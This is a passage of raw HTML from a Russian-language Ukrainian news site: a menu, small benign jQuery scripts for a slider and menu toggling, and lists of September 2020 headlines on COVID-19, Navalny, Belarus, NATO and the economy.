href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_society/full/409-virus-protiv-shkoly-v-minobrazovaniya-predlozhili-straxovat-uchitelej-i-shkolnikov" title="Вирус против школы: В Минобразования предложили страховать учителей и школьников"><img width="210" height="156" alt="Вирус против школы: В Минобразования предложили страховать учителей и школьников" src="https://enovosty.com/wp-content/uploads/2020/09/strahovka.jpg"></a><a href="https://enovosty.com/news_society/full/409-virus-protiv-shkoly-v-minobrazovaniya-predlozhili-straxovat-uchitelej-i-shkolnikov" title="Вирус против школы: В Минобразования предложили страховать учителей и школьников" class="name">Вирус против школы: В Минобразования предложили страховать учителей и школьников <span>(1556)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_politics/full/409-nam-banalno-ne-xvatit-vrachej-stepanov-rasskazal-o-strategii-borby-s-covid-19" title="Нам банально не хватит врачей: Степанов рассказал о стратегии борьбы с COVID-19"><img width="210" height="156" alt="Нам банально не хватит врачей: Степанов рассказал о стратегии борьбы с COVID-19" src="https://enovosty.com/wp-content/uploads/2020/09/stepanov-2.jpg"></a><a href="https://enovosty.com/news_politics/full/409-nam-banalno-ne-xvatit-vrachej-stepanov-rasskazal-o-strategii-borby-s-covid-19" title="Нам банально не хватит врачей: Степанов рассказал о стратегии борьбы с COVID-19" class="name">"Нам банально не хватит врачей": Степанов рассказал о стратегии борьбы с COVID-19 <span>(3252)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/409-rossiya-ustroila-provokacii-nato-nad-barencevym-morem" title="Россия устроила провокации НАТО над Баренцевым морем"><img width="210" height="156" alt="Россия устроила провокации НАТО над Баренцевым морем" src="https://enovosty.com/wp-content/uploads/2020/09/planes.jpg"></a><a href="https://enovosty.com/news_abroad/full/409-rossiya-ustroila-provokacii-nato-nad-barencevym-morem" title="Россия устроила провокации НАТО над Баренцевым морем" class="name">Россия устроила провокации НАТО над Баренцевым морем <span>(4104)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_society/full/309-v-ukraine-obnovili-karantinnye-zony-kto-popal-v-krasnuyu-zonu" title="В Украине обновили карантинные зоны: кто попал в красную зону"><img width="210" height="156" alt="В Украине обновили карантинные зоны: кто попал в красную зону" src="https://enovosty.com/wp-content/uploads/2020/09/thumbs_b_c_822a0fdae0e0512925c95807f473a148.jpg"></a><a href="https://enovosty.com/news_society/full/309-v-ukraine-obnovili-karantinnye-zony-kto-popal-v-krasnuyu-zonu" title="В Украине обновили карантинные зоны: кто попал в красную зону" class="name">В Украине обновили карантинные зоны: кто попал в "красную зону" <span>(1260)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news-auto/full/309-top-5-samyx-populyarnyx-avtomobilej-na-ukrainskom-rynke" title="Топ-5 самых популярных автомобилей на украинском рынке"><img width="210" height="156" alt="Топ-5 самых популярных автомобилей на украинском рынке" src="https://enovosty.com/wp-content/uploads/2020/09/unnamed-1.jpg"></a><a href="https://enovosty.com/news-auto/full/309-top-5-samyx-populyarnyx-avtomobilej-na-ukrainskom-rynke" title="Топ-5 самых популярных автомобилей на украинском рынке" class="name">Топ-5 самых популярных автомобилей на украинском рынке <span>(3628)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/309-xarkovskaya-i-luganskaya-oblasti-v-ogne-chto-izvestno-o-pozharax" title="Харьковская и Луганская области в огне: что известно о пожарах (ВИДЕО)"><img width="210" height="156" alt="Харьковская и Луганская области в огне: что известно о пожарах (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/09/b629227792ef1b2eee2465b2571d2078.jpeg"></a><a href="https://enovosty.com/news_society/full/309-xarkovskaya-i-luganskaya-oblasti-v-ogne-chto-izvestno-o-pozharax" title="Харьковская и Луганская области в огне: что известно о пожарах (ВИДЕО)" class="name">Харьковская и Луганская области в огне: что известно о пожарах (ВИДЕО) <span>(2208)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/309-nazvany-usloviya-torga-lukashenko-s-rossiej-budet-li-legitimnym-soyuznoe-gosudarstvo" title="Названы условия торга Лукашенко с Россией: будет ли легитимным Союзное государство"><img width="210" height="156" alt="Названы условия торга Лукашенко с Россией: будет ли легитимным Союзное государство" src="https://enovosty.com/wp-content/uploads/2020/09/mishustin.png"></a><a href="https://enovosty.com/news_abroad/full/309-nazvany-usloviya-torga-lukashenko-s-rossiej-budet-li-legitimnym-soyuznoe-gosudarstvo" title="Названы условия торга Лукашенко с Россией: будет ли легитимным Союзное государство" class="name">Названы условия торга Лукашенко с Россией: будет ли легитимным "Союзное государство" <span>(2836)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_politics/full/309-zelenskij-i-ermak-vozvrashhayut-klan-yanukovicha-na-klyuchevye-posty-v-strane-geo-leros-video" title="Зеленский и Ермак возвращают клан Януковича на ключевые посты в стране, - Гео Лерос (ВИДЕО)"><img width="210" height="156" alt="Зеленский и Ермак возвращают клан Януковича на ключевые посты в стране, - Гео Лерос (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/09/leros.jpg"></a><a href="https://enovosty.com/news_politics/full/309-zelenskij-i-ermak-vozvrashhayut-klan-yanukovicha-na-klyuchevye-posty-v-strane-geo-leros-video" title="Зеленский и Ермак возвращают клан Януковича на ключевые посты в стране, - Гео Лерос (ВИДЕО)" class="name">Зеленский и Ермак возвращают клан Януковича на ключевые посты в стране, - Гео Лерос (ВИДЕО) <span>(708)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_politics/full/309-vsu-usilitsya-moshhnym-udarnym-vertoletom-kiborg-v-chem-ego-preimushhestva-nad-zarubezhnymi-analogami" title="ВСУ усилится мощным ударным вертолетом Киборг. В чем его уникальность и преимущества над зарубежными аналогами"><img width="210" height="156" alt="ВСУ усилится мощным ударным вертолетом Киборг. В чем его уникальность и преимущества над зарубежными аналогами" src="https://enovosty.com/wp-content/uploads/2020/09/890_450_5f508a9099612-e1599126424527.jpg"></a><a href="https://enovosty.com/news_politics/full/309-vsu-usilitsya-moshhnym-udarnym-vertoletom-kiborg-v-chem-ego-preimushhestva-nad-zarubezhnymi-analogami" title="ВСУ усилится мощным ударным вертолетом Киборг. В чем его уникальность и преимущества над зарубежными аналогами" class="name">ВСУ усилится мощным ударным вертолетом "Киборг". В чем его уникальность и преимущества над зарубежными аналогами <span>(14192)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_economy/full/309-privlech-russkix-k-otvetstvennosti-v-ssha-trebuyut-ostanovit-severnyj-potok-2" title="Привлечь русских к ответственности: В США требуют остановить Северный поток-2"><img width="210" height="156" alt="Привлечь русских к ответственности: В США требуют остановить Северный поток-2" src="https://enovosty.com/wp-content/uploads/2020/09/2667623-3-e1599111422472.jpg"></a><a href="https://enovosty.com/news_economy/full/309-privlech-russkix-k-otvetstvennosti-v-ssha-trebuyut-ostanovit-severnyj-potok-2" title="Привлечь русских к ответственности: В США требуют остановить Северный поток-2" class="name">"Привлечь русских к ответственности": В США требуют остановить "Северный поток-2" <span>(2596)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news-auto/full/309-v-ukraine-mogut-znachitelno-podeshevet-elektromobili" title="В Украине могут значительно подешеветь электромобили"><img width="210" height="156" alt="В Украине могут значительно подешеветь электромобили" src="https://enovosty.com/wp-content/uploads/2020/09/electric_charge_types-e1599072356824.jpg"></a><a href="https://enovosty.com/news-auto/full/309-v-ukraine-mogut-znachitelno-podeshevet-elektromobili" title="В Украине могут значительно подешеветь электромобили" class="name">В Украине могут значительно подешеветь электромобили <span>(7256)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_society/full/209-novejshij-razvedyvatelnyj-korabl-vms-ukrainy-laguna-otpravilsya-na-ispytaniya" title="Новейший разведывательный корабль ВМС Украины «Лагуна» отправился на испытания"><img width="210" height="156" alt="Новейший разведывательный корабль ВМС Украины «Лагуна» отправился на испытания" src="https://enovosty.com/wp-content/uploads/2020/09/159861739384552078311376_13824-1068x712.jpg"></a><a href="https://enovosty.com/news_society/full/209-novejshij-razvedyvatelnyj-korabl-vms-ukrainy-laguna-otpravilsya-na-ispytaniya" title="Новейший разведывательный корабль ВМС Украины «Лагуна» отправился на испытания" class="name">Новейший разведывательный корабль ВМС Украины «Лагуна» отправился на испытания <span>(3828)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_society/full/209-v-xarkovskoj-oblasti-masshtabnyj-pozhar-mestnoe-naselenie-gotovyat-k-evakuacii" title="В Харьковской области масштабный пожар: местное население готовят к эвакуации"><img width="210" height="156" alt="В Харьковской области масштабный пожар: местное население готовят к эвакуации" src="https://enovosty.com/wp-content/uploads/2020/09/medium-1.jpg"></a><a href="https://enovosty.com/news_society/full/209-v-xarkovskoj-oblasti-masshtabnyj-pozhar-mestnoe-naselenie-gotovyat-k-evakuacii" title="В Харьковской области масштабный пожар: местное население готовят к эвакуации" class="name">В Харьковской области масштабный пожар: местное население готовят к эвакуации <span>(9580)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_technology/full/209-antonov-vypustil-pervyj-samolet-bez-detalej-rf-chem-zamenili" title="Антонов выпустил первый самолет без деталей РФ: на помощь пришли США"><img width="210" height="156" alt="Антонов выпустил первый самолет без деталей РФ: на помощь пришли США" src="https://enovosty.com/wp-content/uploads/2020/09/1524680152-41833614.jpeg"></a><a href="https://enovosty.com/news_technology/full/209-antonov-vypustil-pervyj-samolet-bez-detalej-rf-chem-zamenili" title="Антонов выпустил первый самолет без деталей РФ: на помощь пришли США" class="name">Антонов выпустил первый самолет без деталей РФ: на помощь пришли США <span>(3732)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_society/full/209-v-organizme-navalnogo-nashli-sledy-yada-novichok" title="В организме Навального нашли следы яда «Новичок»"><img width="210" height="156" alt="В организме Навального нашли следы яда «Новичок»" src="https://enovosty.com/wp-content/uploads/2020/09/medium.jpg"></a><a href="https://enovosty.com/news_society/full/209-v-organizme-navalnogo-nashli-sledy-yada-novichok" title="В организме Навального нашли следы яда «Новичок»" class="name">В организме Навального нашли следы яда «Новичок» <span>(2780)</span></a></li></ul></li></ul></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости экономики</p></div><div class='cls'></div><span class='news_date'>04.09.2020 г.</span><br /><div class="post_news"><span id="post-4816713"><span class="postDate">13:58</span><a class="postTitle" href="https://enovosty.com/news_economy/full/409-cena-na-neft-ruxnula-na-na-sluxax-o-novyx-skidkax-ot-sauditov">Цена на нефть рухнула на слухах о новых скидках от саудитов</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4816709"><span class="postDate">13:47</span><a class="postTitle" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami">Черный четверг на фондовом рынке США. Богачи расстались с миллиардами</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4816687"><span class="postDate">11:01</span><a class="postTitle" href="https://enovosty.com/news_economy/full/409-ryanair-nachala-otygryvat-upushhennoe-mesyachnyj-trafik-rezko-uvelichilsya">Ryanair начала отыгрывать упущенное. Месячный трафик резко увеличился</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>03.09.2020 г.</span><br /><div class="post_news"><span id="post-4816674"><span class="postDate">21:45</span><a class="postTitle" href="https://enovosty.com/news_economy/full/309-araxamiya-prognoziruet-investicionnyj-bum-v-ukraine-blagodarya-zakonu-ob-investicionnyx-nyanyax-video">Арахамия прогнозирует инвестиционный бум в Украине благодаря закону об инвестиционных нянях (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4816581"><span class="postDate">08:37</span><a class="postTitle" href="https://enovosty.com/news_economy/full/309-privlech-russkix-k-otvetstvennosti-v-ssha-trebuyut-ostanovit-severnyj-potok-2">"Привлечь русских к ответственности": В США требуют остановить "Северный поток-2"</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>02.09.2020 г.</span><br /><div class="post_news"><span id="post-4816514"><span class="postDate">13:45</span><a class="postTitle" href="https://enovosty.com/news_economy/full/209-nacbank-vyvodit-iz-oborota-eshhe-odnu-monetu-kak-eto-povliyaet-na-inflyaciyu">Нацбанк выводит из оборота еще одну монету. Как это повлияет на инфляцию?</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4816499"><span class="postDate">13:10</span><a class="postTitle" href="https://enovosty.com/news_economy/full/209-sbu-propustilo-v-ukrainu-zapreshhennyj-gruz-iz-sirii-rassledovanie">СБУ пропустило в Украину запрещенный груз из Сирии - расследование</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_economy">Все новости экономики</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">04.09.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/409-novyj-politicheskij-sezon-smozhet-li-ze-komanda-uderzhatsya-pri-vlasti">Новый политический сезон: сможет ли Зе-команда удержаться при власти?</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/409-novyj-politicheskij-sezon-smozhet-li-ze-komanda-uderzhatsya-pri-vlasti"><img width="230" alt="Новый политический сезон: сможет ли Зе-команда удержаться при власти?" src="/wp-content/uploads/2020/09/15141733_creenshot_3_large.png"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/409-novyj-politicheskij-sezon-smozhet-li-ze-komanda-uderzhatsya-pri-vlasti">Нынешний политический сезон в Украине будет непростым для украинской власти, так как работать придется не только в сложных социально-экономических условиях ...</a></span></div><div class="block"><div class="info"><span class="postDate">04.09.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/409-protivostoyanie-trampa-i-bajdena-konvulsii-amerikanskoj-identichnosti">Противостояние Трампа и Байдена: Конвульсии американской идентичности</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/409-protivostoyanie-trampa-i-bajdena-konvulsii-amerikanskoj-identichnosti"><img width="230" alt="Противостояние Трампа и Байдена: Конвульсии американской идентичности" src="/wp-content/uploads/2020/09/tramp_bayden.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/409-protivostoyanie-trampa-i-bajdena-konvulsii-amerikanskoj-identichnosti">Все более становится очевидным, что смысл происходящего сейчас в США нельзя объяснить только масштабными социальными протестами, которые в Штатах отнюдь ...</a></span></div><div class="block"><div class="info"><span class="postDate">31.08.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/3108-na-greko-tureckom-fronte-trupov-poka-net">Конфликт Греции и Турции. На греко-турецком фронте погибших пока нет</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/3108-na-greko-tureckom-fronte-trupov-poka-net"><img width="230" alt="Конфликт Греции и Турции. На греко-турецком фронте погибших пока нет" src="/wp-content/uploads/2020/08/gretsiya_turtsiya.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/3108-na-greko-tureckom-fronte-trupov-poka-net">Политика Турции в территориально-ресурсных спорах с Грецией становится все более агрессивной, на что Греция отвечает взаимностью. В извечный, уходящий ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>04.09.2020 г.</span><br /><div class="post_news"> <span id="post-4816723"> <span class="postDate">16:02</span> <a class="postTitle" href="https://enovosty.com/news_society/full/409-v-ternopole-otkazalis-usilivat-karantin-podrobnosti">В Тернополе отказались усиливать карантин: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816715"> <span class="postDate">14:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/409-pora-delat-vyvody-v-polshe-ostro-vyskazalis-o-putinskoj-rf">Пора делать выводы: В Польше остро высказались о путинской России</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816710"> <span class="postDate">14:12</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/409-muzhchiny-tyazhelee-perenosyat-covid-19-issledovanie">Мужчины болеют COVID-19 тяжелее, чем женщины - исследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816713"> <span class="postDate">13:58</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/409-cena-na-neft-ruxnula-na-na-sluxax-o-novyx-skidkax-ot-sauditov">Цена на нефть рухнула на слухах о новых скидках от саудитов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816709"> <span class="postDate">13:47</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami">Черный четверг на фондовом рынке США. Богачи расстались с миллиардами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816700"> <span class="postDate">13:35</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/409-ukraincy-oblyubovali-yaponskie-b-u-avto">В Украине появились необычные б/у авто из Японии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816689"> <span class="postDate">13:05</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/409-skandal-s-naznacheniyami-na-ukrainskoj-tamozhne-kak-marchenko-pytaetsya-zapustit-svoi-sxemy-v-gostamozhsluzhbe">Скандал с назначениями на украинской таможне: как Марченко пытается «запустить» свои схемы в Гостаможслужбе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816703"> <span class="postDate">12:47</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/409-belorusskij-pravitel-mozhet-radovatsya-pochemu-lukashenko-vyjdet-suxim-iz-vody">Белорусский правитель может радоваться: Почему Лукашенко выйдет сухим из воды?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816695"> <span class="postDate">11:51</span> <a class="postTitle" href="https://enovosty.com/news_society/full/409-virus-protiv-shkoly-v-minobrazovaniya-predlozhili-straxovat-uchitelej-i-shkolnikov">Вирус против школы: В Минобразования предложили страховать учителей и школьников</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816694"> <span class="postDate">11:46</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/409-nam-banalno-ne-xvatit-vrachej-stepanov-rasskazal-o-strategii-borby-s-covid-19">"Нам банально не хватит врачей": Степанов рассказал о стратегии борьбы с COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816693"> <span class="postDate">11:39</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/409-poyavilis-podrobnosti-ubijstva-sotrudnicy-verxovnoj-rady">Появились подробности убийства сотрудницы Верховной Рады</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816692"> <span class="postDate">11:03</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/409-predstavitel-ssha-v-obse-nado-ubedit-lukashenko-chto-on-ne-mozhet-byt-prezidentom">Представитель США в ОБСЕ: "Надо убедить Лукашенко, что он не может быть президентом"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816687"> <span class="postDate">11:01</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/409-ryanair-nachala-otygryvat-upushhennoe-mesyachnyj-trafik-rezko-uvelichilsya">Ryanair начала отыгрывать упущенное. Месячный трафик резко увеличился</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816688"> <span class="postDate">10:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/409-rossiya-ustroila-provokacii-nato-nad-barencevym-morem">Россия устроила провокации НАТО над Баренцевым морем</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816685"> <span class="postDate">09:57</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/409-rossijskij-klon-ukrainskogo-neptuna-okazalsya-syrym-i-nedodelannym-zloj-odessit">Российский клон украинского "Нептуна" оказался сырым и недоделанным, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816686"> <span class="postDate">09:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/409-v-ukraine-rezko-vyroslo-chislo-vyyavlennyx-zabolevshix-na-covid-19">В Украине резко выросло число выявленных заболевших на COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816684"> <span class="postDate">08:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/409-pojdem-na-rabotu-i-umrem-ukrainskaya-pervoklassnica-na-linejke-stala-zvezdoj-seti-video">"Пойдем на работу и умрем": Украинская первоклассница на линейке стала звездой Сети (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816683"> <span class="postDate">08:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/409-novye-sankcii-zastavyat-rossiyan-zhit-za-dollar-v-den-voennyj-ekspert">Новые санкции заставят россиян жить за доллар в день, - военный эксперт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816682"> <span class="postDate">08:04</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/409-vrachi-peresadili-legkie-cheloveku-postradavshemu-ot-koronavirusa">Врачи пересадили легкие человеку, пострадавшему от коронавируса</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>03.09.2020 г.</span><br /><div class="post_news"> <span id="post-4816611"> <span class="postDate">23:10</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-kogda-vysota-ne-vyzyvaet-uzhas-amerikanec-s-pomoshhyu-vozdushnyx-sharov-podnyalsya-na-vysotu-7500-m-video">Американец с помощью воздушных шаров поднялся на высоту 7500 м (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816677"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/309-v-novoj-gvinee-obnaruzhili-poyushhix-sobak">В Новой Гвинее обнаружили поющих собак</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816675"> <span class="postDate">21:48</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-uchenye-obnaruzhili-rzhavchinu-na-lune">Ученые обнаружили таинственную ржавчину на Луне</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816674"> <span class="postDate">21:45</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/309-araxamiya-prognoziruet-investicionnyj-bum-v-ukraine-blagodarya-zakonu-ob-investicionnyx-nyanyax-video">Арахамия прогнозирует инвестиционный бум в Украине благодаря закону об инвестиционных нянях (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816672"> <span class="postDate">21:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-v-sevastopole-poyavilas-svalka-grunta-vmesto-xvojnoj-roshhi-zloj-odessit">В Севастополе появилась свалка грунта вместо хвойной рощи, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816668"> <span class="postDate">21:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-stoltenberg-sozval-sovet-nato-iz-za-situacii-s-navalnym">Столтенберг созвал Совет НАТО из-за ситуации с Навальным</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816669"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-v-ukraine-obnovili-karantinnye-zony-kto-popal-v-krasnuyu-zonu">В Украине обновили карантинные зоны: кто попал в "красную зону"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816667"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/309-ukraincam-urezhut-subsidii-bolee-chem-na-2-mlrd-grn-i-peredadut-ix-silovikam-aleksej-goncharenko-video">Украинцам урежут субсидии более чем на 2 млрд грн и передадут их силовикам, - Алексей Гончаренко (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816663"> <span class="postDate">20:48</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/309-top-5-samyx-populyarnyx-avtomobilej-na-ukrainskom-rynke">Топ-5 самых популярных автомобилей на украинском рынке</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816661"> <span class="postDate">20:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-v-yuzhnoj-koree-pokazali-prototip-novejshego-istrebitelya-kf-x-foto">В Южной Корее показали прототип новейшего истребителя KF-X (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816658"> <span class="postDate">19:54</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/309-v-ukraine-uzhestochili-nakazanie-za-ugon-avtomobilej">"Уголовная ответственность": в Украине ужесточили наказание за угон автомобилей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816654"> <span class="postDate">19:38</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-xarkovskaya-i-luganskaya-oblasti-v-ogne-chto-izvestno-o-pozharax">Харьковская и Луганская области в огне: что известно о пожарах (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816652"> <span class="postDate">19:28</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/309-v-stolice-gorit-mnogoetazhka-zhenshhina-spasaetsya-stoya-na-kondicionere-video">В столице горит многоэтажка: женщина спасается стоя на кондиционере (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816651"> <span class="postDate">19:24</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-shvedskij-premer-zayavil-chto-navalnyj-pochti-umer-i-prizval-es-otreagirovat-na-otravlenie">Шведский премьер заявил, что Навальный «почти умер» и призвал ЕС отреагировать на отравление</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816649"> <span class="postDate">18:48</span> <a class="postTitle" 